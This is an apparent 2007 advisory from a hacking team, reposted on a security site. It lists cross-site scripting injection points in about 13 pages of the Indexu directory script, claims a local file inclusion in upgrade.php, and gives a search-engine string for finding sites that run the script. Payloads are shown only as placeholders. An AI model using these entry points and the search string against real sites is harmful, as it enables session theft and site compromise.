SecurityvulnsSECURITYVULNS:DOC:15739vulnerability script indexu all versions
vulnerability script indexu all versions
Found by :SwEET-DeViL & viP HaCkEr & HaCkEr sUn
TeaM AL-GaRNi
Application : indexu
version : all versions
URL : http://www.nicecoder.com/
google : "Powered by INDEXU 5."
Exploits :
|//1\\|
in upgrade.php
http://www.site.com/INDEXU_PATH/upgrade.php?pflag=upgrade&true&gateway=[XSS] ___or #…/index.php
AND Local File Include~
##########################
|//2\\|
in suggest_category.php
http://www.site.com/INDEXU_PATH/suggest_category.php?error_msg=[XSS]
##########################
|//3\\|
in user_detail.php
http://www.site.com/INDEXU_PATH/user_detail.php?u=[XSS]
##########################
|//4\\|
in tell_friend.php
http://www.site.com/INDEXU_PATH/tell_friend.php?friend_name=[XSS]
http://www.site.com/INDEXU_PATH/tell_friend.php?friend_email=[XSS]
http://www.site.com/INDEXU_PATH/tell_friend.php?error_msg=[XSS]
http://www.site.com/INDEXU_PATH/tell_friend.php?my_name=[XSS]
http://www.site.com/INDEXU_PATH/tell_friend.php?my_email=[XSS]
http://www.site.com/INDEXU_PATH/tell_friend.php?id=[XSS]
##########################
|//5\\|
in sendmail.php
http://www.site.com/INDEXU_PATH/sendmail.php?error_msg=[XSS]
http://www.site.com/INDEXU_PATH/sendmail.php?email=[XSS]
http://www.site.com/INDEXU_PATH/sendmail.php?name=[XSS]
http://www.site.com/INDEXU_PATH/sendmail.php?subject=[XSS]
##########################
//6\\
in send_pwd.php
http://www.site.com/INDEXU_PATH/send_pwd.php?email=[XSS]
http://www.site.com/INDEXU_PATH/send_pwd.php?error_msg=[XSS]
http://www.site.com/INDEXU_PATH/send_pwd.php?username=[XSS]
##########################
|//7\\|
in search.php
http://www.site.com/INDEXU_PATH/search.php?keyword=[XSS]
##########################
|//8\\|
http://www.site.com/INDEXU_PATH/register.php?error_msg=[XSS]
http://www.site.com/INDEXU_PATH/register.php?username=[XSS]
http://www.site.com/INDEXU_PATH/register.php?password=[XSS]
http://www.site.com/INDEXU_PATH/register.php?password2=[XSS]
http://www.site.com/INDEXU_PATH/register.php?email=[XSS]
##########################
|//9\\|
power_search.php
http://www.site.com/INDEXU_PATH/power_search.php?url=[XSS]
http://www.site.com/INDEXU_PATH//power_search.php?contact_name=[XSS]
http://www.site.com/INDEXU_PATH//power_search.php?email=[XSS]
##########################
|//10\\|
in new.php
http://www.site.com/INDEXU_PATH/new.php?path=[XSS]
http://www.site.com/INDEXU_PATH//new.php?total=[XSS]
##########################
|//11\\|
in modify.php
http://www.site.com/INDEXU_PATH/modify.php?pflag=search&query=[XSS]
##########################
|//12\\|
in mailing_list.php
http://www.site.com/INDEXU_PATH/mailing_list.php?error_msg=[XSS]
http://www.site.com/INDEXU_PATH/mailing_list.php?email=[XSS]
##########################
|//13\\|
in login.php
http://www.site.com/INDEXU_PATH/login.php?error_msg=[XSS]
##########################
|//…$…\\|
There is another vulnerability in the program, a XSS
:::::::::::::::::::::::::::::::::
:: ########### ########### ::
:: ########### ########### ::
:: ### ### ### ::
:: ### ########### ::
:: ### ###### ########### ::
:: ### ## ### == ### ### ::
:: ### ### == ### ### ::
:: ############ ### ### ::
:: ############ ### ### ::
:::::::::::::::::::::::::::::::::
##########################
#####[email protected]##
#####[email protected]########
########(c)2007###########